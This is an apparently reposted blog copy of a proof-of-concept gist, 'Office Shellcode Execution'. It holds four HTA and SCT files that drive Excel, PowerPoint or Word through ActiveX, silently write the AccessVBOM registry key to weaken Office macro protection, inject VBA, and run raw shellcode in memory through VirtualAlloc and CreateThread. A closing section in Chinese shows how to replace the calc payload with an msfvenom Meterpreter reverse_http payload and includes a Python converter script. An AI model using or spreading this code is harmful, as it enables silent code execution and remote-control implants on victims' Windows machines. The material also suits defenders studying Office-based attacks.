Office Shellcode Execution

From: https://gist.github.com/subTee/e126c6ee847a4d9fcfd7
CalcExcel.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
xlmodule.CodeModule.AddFromString(strCode);
objExcel.Run("ExecShell");
objExcel.DisplayAlerts = false;
objWorkbook.Close(false);
close();
</script>
</head>
<body>
Thank you. You may close this window.
</body>
</html>

CalcPPT.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<html>
<head>
<script>
var objPPT = new ActiveXObject("PowerPoint.Application");
objPPT.Visible = true;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objPPT.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\PowerPoint\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objPreso = objPPT.Presentations.Add();
var pptmodule = objPreso.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Public Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
pptmodule.CodeModule.AddFromString(strCode);
objPPT.Run("ExecShell");
objPPT.DisplayAlerts = false;
objPPT.Quit();
close();
</script>
</head>
<body>
Thank you. You may close this window.
</body>
</html>

CalcWord.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<html>
<head>
<script>
var objWord = new ActiveXObject("Word.Application");
objWord.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objWord.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Word\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objDoc = objWord.Documents.Add();
var wdmodule = objDoc.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
wdmodule.CodeModule.AddFromString(strCode);
objWord.Run("ExecShell");
objWord.DisplayAlerts = false;
objDoc.Close(false);
//close();
</script>
</head>
<body>
Thank you. You may close this window.
</body>
</html>

calc.sct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?XML version="1.0"?>
<scriptlet>
<registration
progid="CalcShellcode"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ -->
<script language="JScript">
<![CDATA[

var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
xlmodule.CodeModule.AddFromString(strCode);
objExcel.Run("ExecShell");
objExcel.DisplayAlerts = false;
objWorkbook.Close(false);

]]>
</script>
</registration>
</scriptlet>

修改payload方法:

1
msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.txt

选择要用的几行,简单处理一下:

1
2
3
4
5
f = open('msf.txt')
o = open('out.txt', 'w+')
for line in f:
o.write("strCode += '")
o.write(line.strip("\n")+"\\n'\n")

------本文结束,感谢阅读------